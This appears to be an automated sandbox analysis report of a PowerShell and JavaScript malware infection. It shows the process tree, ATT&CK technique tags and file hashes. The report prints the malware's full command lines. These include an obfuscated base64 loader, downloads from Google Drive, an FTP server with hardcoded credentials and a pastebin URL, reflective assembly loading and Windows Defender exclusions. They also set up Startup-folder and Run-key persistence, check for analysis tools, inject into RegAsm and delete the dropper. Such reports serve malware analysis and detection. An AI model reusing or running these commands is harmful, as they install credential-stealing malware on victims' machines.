[char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAnACAAKwAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAAKwAgACcAIAAtAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAFUAVA' + [char]66 + 'GADgAKQA7ACcAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAKwA9ACAAJw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAEYAeQ' + [char]66 + 'mAGQAegAgAD0AIA' + [char]66 + 'bAHMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACgAIAAkAHIAeQ' + [char]66 + 'hAGUARwAuAHIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAnACcAkyE6AJMhJwAnACwAJwAnAEEAJwAnACkAIAApACAAOwAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEEAcA' + [char]66 + 'wAEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAF0AOgA6AEMAdQ' + [char]66 + 'yAHIAZQ' + [char]66 + 'uAHQARA' + [char]66 + 'vAG0AYQ' + [char]66 + 'pAG4ALg' + [char]66 + 'MAG8AYQ' + [char]66 + 'kACgAIAAkAEYAeQ' + [char]66 + 'mAGQAegAgACkALgAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJwAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALg' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMAMQAnACcAIAApAC4ARw' + [char]66 + 'lAHQATQAnACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgACsAPQAgACcAZQ' + [char]66 + '0AGgAbw' + [char]66 + 'kACgAIAAnACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACAAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACAALAAgAFsAbw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAWw' + [char]66 + 'dAF0AIAAoACAAJwAnAGsANw' + [char]66 + 'OAG4ATQ' + [char]66 + 'DAFAAQwAvAHcAYQ' + [char]66 + 'yAC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'uAGkAYg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAJwAgACwAIAAnACcAJQ' + [char]66 + 'EAEMAUA' + [char]66 + 'KAFUAJQAnACcAIAAsACAAIAAnACcARAAgAEQARA' + [char]66 + 'SAGUAZw' + [char]66 + '' + [char]66 + 'AHMAbQAnACcAIAAgACkAIAApADsAJwA7ACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAPQAgACgAIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAzAC4AcA' + [char]66 + 'zADEAJwApACAAOwAkAE0ATw' + [char]66 + 'EAFIAZwAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAgAC0ARQ' + [char]66 + '4AGUAYw' + [char]66 + '1AHQAaQ' + [char]66 + 'vAG4AUA' + [char]66 + 'vAGwAaQ' + [char]66 + 'jAHkAIA' + [char]66 + 'CAHkAcA' + [char]66 + 'hAHMAcwAgAC0ARg' + [char]66 + 'pAGwAZQAgACQAVg' + [char]66 + 'CAFcAVw' + [char]66 + '6ACAAOw' + [char]66 + '9ADsA';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js') ;powershell $jPhaA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"5⤵PID:4076
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1'"5⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1'"5⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"7⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\sxodr.ps1"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Start-Sleep -Seconds 1 ; powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\pesister.ps1"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\pesister.ps17⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:2128
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2972
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js"5⤵PID:116
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Window
1Indicator Removal
1File Deletion
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\llmpy.ps1
Filesize431B
MD541808e4dff98745ca29df11645e71782
SHA128a2a6c3f0568927c68cca99b62b164488370f54
SHA256a40e183a9b3b6edb3453f3ce54feba13bbfd2f1364237df1a151008f64f032b1
SHA5124d3cee52335bc32e7864c3f191f95d1ac260d35216abdf67b31b67c98d59d7b18ca98a2d8e38c1543bca40689c4e518e3c35fa6207e61bc51bc18f48754840c4
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\mcdlq.ps1
Filesize426B
MD5ba1104392c84008e21a6640f631a60e6
SHA10f702084902b026ed660b51db6432758b03bad7a
SHA2560f572cc2807b65c5b05abcd8032a1c6cf1f8360116362678da249b23037a7c89
SHA5129f82120f2444a3a2e10f2f25afd21633132a615f103f932a24cb07cd1c3d4691df3e4903d9dff25653e37acf5b5aa9c66b2ba6e72b02f1370fc37bee4f804a66
-
C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\sxodr.ps1
Filesize225KB
MD596e48a88523f9505cd66b7be1e1bad81
SHA17a626d4e1a451e24692ed0b419f917cb3dd2e8ca
SHA256a4f366899e0f82d1ceeb018bf52ffbda68a9412998c0fbc36ec2a75806cf5626
SHA5120b7759a86fa6a43ae6b2212d542174a6f552027e94e1a71e009b094f748bc16b6b03b0a98f31a4cbe919949edda6d8499c16b490d93144bd809d3659a18f9584
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD51c20a583d307455f113ba9b0f8393e9e
SHA1c2526f856b88553ab97dd99d53aa8e5e9d8a353f
SHA25617b5cae30fcc407e92e6208371ad3d9757fc61e099d54e74d2d80d133e81ec75
SHA512353f8529bad9cb6ffc4aac4a36ceb1c1afd478c6e1e475e29229e5f710395f1a795890245141c77873541ef3fcde26fca1eb35341a0743d153c890c53bef7762
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD55161e9d6b9b677b7af6e5bb11a361b91
SHA19fe0a04c2bb86467b9aa584c78db4fc7eccfdd42
SHA256addb0aa038e121d21d7b4bd4ba49316c05294a582cb430eb37ce3925324bd3d0
SHA51295b4a85b4240145d35f1f14bc07ee87b597d484935599f898074be16a7bfcc6fdb36e31e5afedac1c83bdbcbf402c40a3573f2b3512ba521f3ad29fd503f7749
-
Filesize
948B
MD5ca885ce2b7a4be34acd565a65ea19984
SHA18c5d9a4507aab2ef743cd08cee8d0dff7a43bb99
SHA256c22434ffab6b0df6d60e3f56e0f87e550abd72566622de3d7458ba027ed7378c
SHA5121cba207f47a009cbc0fdf2a6cf13ef8215e7b28c7d0912006238db9c91dc23c0528e3ba87e02bddc6c7588b346954d4f9bbf426d80159d163318a8b63cc5cebe
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD5d8aa46519ec94eeb437899c911093264
SHA1a9e50ca174284614280683ec067c26f9b25c91f4
SHA2560fa73f0afd84e94684b7e170aca221854e015e4d375d8e76e13675c94b4df2e9
SHA512037f1e61b996cd06d2e394cd56e6a2f2bf2c1903ca35dbe21021a1d394298b8954acec61780e9c7330675992e8749888f52cf352d9715533312b710b30723909
-
Filesize
1KB
MD5a68fcc3482ebb381cd7eb80d4dfc7ac9
SHA168f694b1b7999996678244d8ef9d95f520ec2e39
SHA2561bfbb143c70207d28f8266d08a28e052467ad0eab48c65c19ba8636d44093ea0
SHA512a8a5cc66e81ebb417dcd216541690a31913f8a9cbe676b76ac451c009540ef33558dba762da1736c0f61fb36dfaa71f0926ac1ab8919a892a8ab49087999a2d8
-
Filesize
1KB
MD54bacc69236cb4a4b9ec092130adcbee0
SHA1a918767842fcd48e611729d471eeec1f7ba6f819
SHA256c8330d7880df7f49c106d51aa3444f71b64bc563998e39786491a669196a771f
SHA5120a7db3521d33ae0bebb0ccf2d23647961a68c67aade700769dea338d47a5823fa0b6c4dd70aa2892c09bc166e3211421e82ac4fdcb3bd17ceb0be480e6c2cabb
-
Filesize
1KB
MD53ca75313de7ebb3a430fcb67070ab281
SHA158e09f7d879477b8b9b0ba59f13cfe749938779e
